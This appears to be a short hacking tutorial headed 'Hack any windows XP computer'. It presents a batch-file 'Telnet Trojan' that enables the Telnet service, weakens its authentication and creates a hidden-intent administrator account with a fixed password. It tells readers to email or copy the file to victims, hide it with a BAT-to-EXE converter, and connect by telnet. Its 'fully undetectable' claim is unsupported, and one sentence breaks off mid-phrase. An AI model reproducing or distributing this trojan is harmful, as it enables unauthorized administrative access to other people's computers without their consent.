(Hack any windows XP computer)
Telnet Trojan Target : All windows XP machines.
Features: Fully undetectable for all antiviruses.
echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user leoimpact /add
net user leoimpact leo123
net localgroup administrators leoimpact /add
Write the above code in the notepad and save as myvirus.bat and send it through email, pen
drive, etc to other system for remote control.
Action: After executing the above script a user leoimpact is created and its password is: leo123 and
then telnet port will open with full administrative rights.
Note: The limitation of the above script is that the user will be visible on the target system. But
we can hide the user with help of downloading and executing the
This script has another limitation which shows a prompt which may caution the target system
user but we can hide prompt window with help of BAT to EXE converter.
[Download link: www.thesecretofhacking.com/sw/ch2/bat.zip ]
How to Connect Remote Machine:
C:\> Telnet remotemachineipaddress [enter]
Thanks for sharing This valuable information.
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